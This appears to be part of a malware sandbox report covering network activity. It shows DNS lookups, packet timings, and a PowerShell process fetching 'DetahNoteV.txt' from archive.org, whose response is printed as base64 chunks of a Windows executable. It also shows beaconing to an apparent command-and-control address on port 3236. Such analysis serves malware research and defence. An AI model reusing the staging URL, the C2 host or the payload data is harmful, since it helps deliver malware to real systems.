                                        Oct 2, 2024 05:23:14.422921896 CEST49706443192.168.2.9188.114.96.3
                                        Oct 2, 2024 05:23:14.423516035 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.423548937 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.423599005 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.423602104 CEST49706443192.168.2.9188.114.96.3
                                        Oct 2, 2024 05:23:14.423612118 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.423640966 CEST49706443192.168.2.9188.114.96.3
                                        Oct 2, 2024 05:23:14.424254894 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.424288034 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.424302101 CEST49706443192.168.2.9188.114.96.3
                                        Oct 2, 2024 05:23:14.424314022 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.424356937 CEST49706443192.168.2.9188.114.96.3
                                        Oct 2, 2024 05:23:14.424361944 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.424819946 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.424849987 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.424861908 CEST49706443192.168.2.9188.114.96.3
                                        Oct 2, 2024 05:23:14.424871922 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.424906969 CEST49706443192.168.2.9188.114.96.3
                                        Oct 2, 2024 05:23:14.439229012 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.439415932 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.439506054 CEST49706443192.168.2.9188.114.96.3
                                        Oct 2, 2024 05:23:14.439529896 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.439578056 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.439620018 CEST49706443192.168.2.9188.114.96.3
                                        Oct 2, 2024 05:23:14.439625978 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.440073967 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.440134048 CEST49706443192.168.2.9188.114.96.3
                                        Oct 2, 2024 05:23:14.440145016 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.440155029 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.440196991 CEST49706443192.168.2.9188.114.96.3
                                        Oct 2, 2024 05:23:14.440202951 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.440751076 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.440797091 CEST49706443192.168.2.9188.114.96.3
                                        Oct 2, 2024 05:23:14.440808058 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.440856934 CEST44349706188.114.96.3192.168.2.9
                                        Oct 2, 2024 05:23:14.440898895 CEST49706443192.168.2.9188.114.96.3
                                        Oct 2, 2024 05:23:14.441216946 CEST49706443192.168.2.9188.114.96.3
                                        Oct 2, 2024 05:23:16.895025015 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:23:16.900085926 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:23:16.900167942 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:23:16.939838886 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:23:16.944859028 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:23:17.370886087 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:23:17.376710892 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:23:17.381443024 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:23:17.480983019 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:23:17.524329901 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:23:18.783832073 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:23:18.788703918 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:23:18.788764954 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:23:18.793637991 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:23:32.853888988 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:23:32.858819008 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:23:32.858930111 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:23:32.863775015 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:23:32.977888107 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:23:33.024452925 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:23:33.066251993 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:23:33.074096918 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:23:33.078906059 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:23:33.078989029 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:23:33.083794117 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:23:36.741945028 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:23:36.789992094 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:23:36.882548094 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:23:36.930644989 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:23:46.931740046 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:23:46.936702967 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:23:46.936770916 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:23:46.945113897 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:23:47.055147886 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:23:47.102564096 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:23:47.143615007 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:23:47.145968914 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:23:47.150826931 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:23:47.150918007 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:23:47.155769110 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:01.009716988 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:01.014671087 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:01.014743090 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:01.019642115 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:01.133954048 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:01.180810928 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:01.265253067 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:01.269010067 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:01.273879051 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:01.273945093 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:01.278747082 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:06.748650074 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:06.790200949 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:07.840341091 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:07.841212034 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:07.841264963 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:07.841911077 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:07.841969967 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:07.842024088 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:07.842067957 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:15.087841988 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:15.092845917 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:15.092941999 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:15.097862005 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:15.212888002 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:15.259124994 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:15.301291943 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:15.306477070 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:15.311814070 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:15.311929941 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:15.319633961 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:29.166042089 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:29.171139956 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:29.171207905 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:29.176232100 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:29.290241957 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:29.337236881 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:29.421458960 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:29.423607111 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:29.428472042 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:29.428529024 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:29.433353901 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:36.737736940 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:36.790469885 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:36.869191885 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:36.915426970 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:43.260516882 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:43.265590906 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:43.265683889 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:43.270458937 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:43.385108948 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:43.435686111 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:43.674761057 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:43.679114103 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:43.683917999 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:43.684016943 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:43.688875914 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:57.338371992 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:57.343230009 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:57.343333960 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:57.348076105 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:57.462655067 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:57.509356976 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:57.550985098 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:57.553323984 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:57.558094025 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:24:57.558177948 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:24:57.562912941 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:25:06.889800072 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:25:06.889939070 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:25:06.889976025 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:25:11.416162014 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:25:11.421088934 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:25:11.421294928 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:25:11.426093102 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:25:11.540035009 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:25:11.587574959 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:25:11.628417969 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:25:11.630433083 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:25:11.635330915 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:25:11.635426044 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:25:11.640294075 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:25:17.275391102 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:25:17.280339003 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:25:17.280422926 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:25:17.285242081 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:25:17.398983002 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:25:17.446902990 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:25:17.529566050 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:25:17.530378103 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:25:17.535202980 CEST323649707148.113.165.11192.168.2.9
                                        Oct 2, 2024 05:25:17.535259008 CEST497073236192.168.2.9148.113.165.11
                                        Oct 2, 2024 05:25:17.540117979 CEST323649707148.113.165.11192.168.2.9
                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 2, 2024 05:23:10.127655983 CEST5809953192.168.2.91.1.1.1
                                        Oct 2, 2024 05:23:10.275121927 CEST53580991.1.1.1192.168.2.9
                                        Oct 2, 2024 05:23:13.345092058 CEST6440653192.168.2.91.1.1.1
                                        Oct 2, 2024 05:23:13.353423119 CEST53644061.1.1.1192.168.2.9
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Oct 2, 2024 05:23:10.127655983 CEST192.168.2.91.1.1.10x5274Standard query (0)ia600100.us.archive.orgA (IP address)IN (0x0001)false
                                        Oct 2, 2024 05:23:13.345092058 CEST192.168.2.91.1.1.10x9d3aStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Oct 2, 2024 05:23:10.275121927 CEST1.1.1.1192.168.2.90x5274No error (0)ia600100.us.archive.org207.241.227.240A (IP address)IN (0x0001)false
                                        Oct 2, 2024 05:23:13.353423119 CEST1.1.1.1192.168.2.90x9d3aNo error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                        Oct 2, 2024 05:23:13.353423119 CEST1.1.1.1192.168.2.90x9d3aNo error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                        • ia600100.us.archive.org
                                        • paste.ee
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.949705207.241.227.2404436528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-02 03:23:10 UTC109OUTGET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
                                        Host: ia600100.us.archive.org
                                        Connection: Keep-Alive
                                        2024-10-02 03:23:11 UTC606INHTTP/1.1 200 OK
                                        Server: nginx/1.24.0 (Ubuntu)
                                        Date: Wed, 02 Oct 2024 03:23:11 GMT
                                        Content-Type: text/plain; charset=utf-8
                                        Content-Length: 2823512
                                        Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
                                        Connection: close
                                        ETag: "66e22cba-2b1558"
                                        Strict-Transport-Security: max-age=15724800
                                        Expires: Wed, 02 Oct 2024 09:23:11 GMT
                                        Cache-Control: max-age=21600
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                        Access-Control-Allow-Credentials: true
                                        Accept-Ranges: bytes
                                        2024-10-02 03:23:11 UTC15778INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                        Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
                                        2024-10-02 03:23:11 UTC16384INData Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61
                                        Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
                                        2024-10-02 03:23:11 UTC16384INData Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41
                                        Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
                                        2024-10-02 03:23:11 UTC16384INData Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65
                                        Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
                                        2024-10-02 03:23:11 UTC16384INData Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41
                                        Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
                                        2024-10-02 03:23:11 UTC16384INData Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f
                                        Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
                                        2024-10-02 03:23:11 UTC16384INData Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f
                                        Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
